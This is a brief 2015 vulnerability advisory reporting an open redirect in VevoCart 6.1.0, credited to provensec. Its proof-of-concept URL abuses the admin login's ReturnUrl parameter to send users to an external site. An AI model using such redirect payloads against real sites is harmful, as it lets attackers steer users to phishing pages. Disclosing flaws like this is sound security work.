Vevocart 6.1.0 Open Redirect

Posted on 30 May 2015

# Affected software: vevocart # Type of vulnerability:url redirection # URL:vevocart.com # Discovered by: provensec # Website: provensec.com #version:VevoCart 6.1.0 # Proof of concept http://multistore1.vevocart.com/admin/Login.aspx?ReturnUrl=%2f%2fgoogle.com